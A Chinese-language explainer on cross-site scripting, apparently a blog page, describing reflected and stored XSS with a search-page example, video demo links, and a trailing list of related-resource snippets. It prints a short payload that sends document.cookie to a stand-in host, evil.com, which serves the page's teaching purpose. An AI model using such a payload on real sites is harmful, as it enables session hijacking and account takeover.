XSS 是一种很常见的攻击手段,在该攻击中攻击者将一个恶意代码段注入到一个运行良好的站点中。XSS 攻击有如下两种基本的类型:
- Reflected XSS
- Stored XSS
Reflected XSS
Reflected XSS 攻击的前提条件是某Web应用程序会把用户输入的信息不加检查和限制地返回给用户。一个常见的例子就是,用户登录时,输入用户名和密码,比如用户Joe登 录,密码错误了,网站会显示Sorry, Joe, Your password is incorrect。网站把用户名直接返回给用户, 如果用户输入了Javascript代码,会直接返回给用户,并造成Javascript代码执行。reflected XSS利用了 Web 应用程序安全性低的弱点,该应用程序在浏览器中显示输入参数而不对其中是否存在活动内容进行检查。通常,攻击者会诱使受害者单击 URL。
document.images[0].src="http://evil.com/steal?cookie="
+ document.cookie; </script>
假设 trusted.com 提供了一个服务,该服务具有一个搜索特性能把搜索结果和输入的关键字一起提交回来。如果搜索应用程序没有过滤 URL 中的一些特殊字符(如小于号 (<) 和大于号 (>)),则 <script> 标记也将被插入到用户 Web 页面中,这样将会把文档的 cookie 发送给远程服务器 evil.com。攻击者一旦有了cookie就可以以用户的身份登录网站。
Reflected XSS Demo: http://www.youtube.com/watch?v=V79Dp7i4LRM
Stored XSS
随着 Web 2.0 的普及 stored XSS 攻击越来越严重。Web 2.0 成功的关键是大众之间的共享、交互和协作,因此用户有更多的机会可以通过一些服务(比如说社会网络服务(social network services,SNS)、wiki 或 blog)看到其他用户(具有潜在恶意性)的输入。
不管怎样,输入值验证和数据消毒(sanitation)是防止 XSS 攻击的关键因素。通常,Web 服务器从用户输入中移除脚本,但是攻击者经常会利用服务器的弱点绕过这些过滤器,从而造成一些重大的攻击,比如说 Yamanner 或 MySpaceIn 蠕虫。
Stored XSS Demo: http://www.youtube.com/watch?v=7M-R6U2i5iI
相关推荐
**跨站脚本攻击(Cross-Site Scripting, XSS):威胁、机制与防范** 在当今高度数字化的社会中,网络安全已成为不可忽视的关键议题。其中,跨站脚本攻击(Cross-Site Scripting, XSS)是一种常见的网络攻击方式,对...
跨站脚本攻击(Cross-Site Scripting,简称XSS)是一种常见的网络安全漏洞,主要出现在Web应用程序中。这类攻击通常利用Web应用对用户输入数据处理不当的情况,允许攻击者将恶意脚本注入到网页中,当其他用户访问...
### 跨站脚本攻击(Cross-Site Scripting, XSS)概述 跨站脚本攻击(Cross-Site Scripting, 简称XSS),是一种常见的网络安全漏洞,它允许攻击者将恶意脚本注入到看似无害的数据中,然后通过受害者的浏览器执行这些...
其中,跨站脚本(Cross-Site Scripting,简称XSS)攻击作为一种常见的安全威胁,不仅能够危害用户的隐私和数据安全,还可能被用于传播蠕虫和病毒等恶意代码。本文将深入探讨XSS蠕虫与病毒的相关概念、工作原理及其...
动态站点会受到一种名为“跨站脚本攻击”(Cross Site Scripting, 安全专家们通常将其缩写成XSS,原本应当是css,但为了和层叠样式表(Cascading Style Sheet,CSS )有所区分,故称XSS)的威胁,而静态站点则完全不受...
xss
### XSS Attacks: Cross-Site Scripting Exploits and Defense #### 概述 跨站脚本攻击(Cross-Site Scripting, XSS)是一种常见的网络安全威胁,尤其针对Web应用程序。本书《XSS Attacks: Cross-Site Scripting ...
### Syngress Cross Site Scripting Attacks XSS Exploits and Defense May 2007 #### 知识点一:跨站脚本攻击(Cross-Site Scripting, XSS) **定义与原理** 跨站脚本攻击(Cross-Site Scripting, 简称XSS)是一...
4/159 Syngress - Xss Attacks - Cross Site Scripting Exploits And Defense
本文献探讨了一种名为“文档结构完整性”(Document Structure Integrity,简称DSI)的新方法,旨在为跨站脚本(Cross-Site Scripting,简称XSS)攻击提供有效的防御机制。该文献由Yacin Nadji、Prateek Saxena和...
XSS(Cross-Site Scripting)跨站脚本攻击是一种常见的安全威胁,它利用Web应用程序的安全漏洞,将恶意脚本注入到合法的网页中,进而攻击最终用户。XSS攻击主要分为以下两种类型: 1. **存储型XSS**(Persistent ...
本资源讲解了存储型XSS(Cross-Site Scripting)的攻击场景实践,通过DVWA(Damn Vulnerable Web Application)平台来演示整个攻击过程。 知识点1:存储型XSS的定义和原理 存储型XSS是一种类型的跨站脚本攻击,...
XSS跨站点脚本注入攻击过滤器,包括antisamy官方提供的各种策略xml文件。 antisamy-slashdot.xml 策略 antisamy-ebay.xml 策略 antisamy-myspace.xml 策略 antisamy-anythinggoes.xml 策略
XSS,全称为"Cross Site Scripting",是一种常见的网络安全漏洞,它允许攻击者在用户的浏览器中注入恶意脚本。这种攻击方式通常发生在Web应用中,攻击者利用网站未能充分过滤或转义用户输入的数据,将恶意代码嵌入到...
XSS(Cross-site scripting)是一种常见的Web应用程序安全漏洞,允许攻击者在用户浏览器中注入恶意脚本。"xss-labs-master.rar" 提供了一个针对XSS漏洞的专项练习平台,旨在帮助初学者及安全爱好者提升对XSS攻击的...
在前端开发中,XSS(Cross-site scripting)攻击是一种常见的安全威胁,它允许攻击者通过注入恶意脚本到网页上,从而控制用户浏览器的行为。"前端开源库-xss-filters"是一个专门针对这种情况设计的开源库,其目标是...
https://gbhackers.com/a3-cross-site-scripting-xss/ 跨站点“Scripter”(又名Xsser)是一个自动框架,用于检测、利用和报告基于Web的应用程序中的XSS漏洞。 它包含几个可以绕过某些过滤器的选项,以及各种特殊的...
【XSS(Cross-site scripting)攻击】XSS是指攻击者通过注入恶意脚本到网页中,当用户浏览这些页面时,嵌入的脚本会被执行,可能导致敏感信息泄露或用户行为被操控。预防措施包括:输入验证、输出编码、使用...
首先,我们需要理解什么是XSS(Cross-Site Scripting,跨站脚本攻击)。XSS是一种常见的网络攻击方式,攻击者通过注入恶意脚本到网页中,当其他用户访问这些被注入脚本的页面时,恶意代码将在用户的浏览器中执行,...